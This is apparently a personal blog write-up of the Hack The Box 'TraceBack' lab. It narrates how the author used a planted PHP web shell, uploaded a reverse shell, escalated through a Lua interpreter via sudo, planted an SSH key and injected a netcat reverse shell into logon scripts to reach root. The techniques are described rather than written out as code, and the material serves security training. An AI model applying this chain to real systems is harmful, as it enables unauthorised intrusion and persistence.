035#:HTB - TraceBack
A new week and another room. This time it is TraceBack on Hack the Box. This one is rated a bit tougher by users than the others we’ve been doing so there may be something tricky with this one.
There isn’t much going on here. I start by getting a gobuster scan running and I began to poke around the website.
Looks like this server has already been owned, very spooky. But they claim to have left a back door that we will probably want to use. Found another hint in the source code of the page.
I got unusually stuck at this point. There is virtually nothing to go off of right now so I did a couple guided mode questions to catch back up. The second questions has us googling the message we found in the source code.
This is slightly annoying for a couple reasons. I don’t think it is realistic so it’s a frustrating to waste time only to learn that was the solution and I would be worried that googling something like that would just give me walkthroughs to this room. Its not like looking up an exploit, it’s a quote from a fictional hacker. But anyway, let’s move on.
Searching the hacker’s message leads us to this repo with some web shells. The hint told us to check php so I just start navigating to each php webshell as a site directory until I got one that worked.
Attempting to log in using admin/admin which works. I started poking around a little, beginning with the Console tab. I found a note on our user’s desktop about Lua.
Found another hidden message.
This hint isn’t meaning much to me right now though. I’ve never used a premium web shell like this so I kept poking around various functions. Checking our sudo rights proves interesting.
This web shell feels clunky though, so I made a php reverse shell payload on my machine, spun up a python web server, and downloaded the payload to the victim’s webroot folder. After starting a listener, we can navigate to “http://10.10.10.181/payload.php” in our web browser to get shell.
I moved to stabilize my shell before exploring further. Then, I copied and ran LinPEAS on the victim while I began exploring the sudo rights more. Running the command as the sysadmin user gets us some sort of app cli interface. Looking up luvit, I see it’s a scripting engine for Lua which makes sense with that hint we saw earlier. I referenced GTFObins to help make a Lua payload.
I had to play with the syntax a bit and learn more about how luvit REPL works, but then I was able to use the Shell exploit listed on GTFObins to get access to the sysadmin account. This also gets us our first flag.
After getting that, I ran a script for a reverse python shell because the current one is horrible. I moved back to /tmp and ran linpeas as our new user. LinPEAS flagged a highly likely escalation path we are going to explore first.
I struggled here for a while. It looks like these logon scripts are reverted very shortly after editing them and I need to be able to trigger them with a log on. I generated SSH keys on my machine and put the public one into the /home/sysadmin/.ssh/authorized_keys file then confirmed I can log in via ssh.
Now the madness began. The setup was simple but finding a payload that would work and doing it fast enough was giving me trouble. Basically, I had three terminal windows open for this portion. One window running a netcat listener, one ready to login via ssh, and a third that was already logged into ssh so that I could echo a reverse shell payload into the end of one of the logon scripts.
These scripts are getting reverted every few seconds though so we have to edit the script and then try to connect via ssh right away. You can see bunch of my failed attempts but the one that worked was a mkfifo netcat shell. It also only kind-of worked the first time, but the shell was locked up and I had to start over. I thought it didn’t work at first but I looped back to it again since it got further than the other shells.
Finally I was able to get the timing and payload right. We can see we now have a new session as root and of course our final flag.
This room was an interesting one and a bit frustrated at first. I don’t mind spending a bunch of time working through a room if there is a valuable lesson to be learned, but for getting initial access I think the hacker’s comment in the source code was a bad segue.
I don’t search for things too specific to a room to avoid spoilers so I would never be inclined to google the phrase “Some of the best web shells that you might need”. I’d be worried that searching a random phrase like that would be so specific to the room that it would just result in the answer/walkthroughs.
Walkthroughs are a great tool (especially mine), but I really like to push myself before seeking a hint. But to push myself and then learn that it was something I find unrealistic just feels like a waste of time. Overall, not my favorite room but I still enjoyed working through it.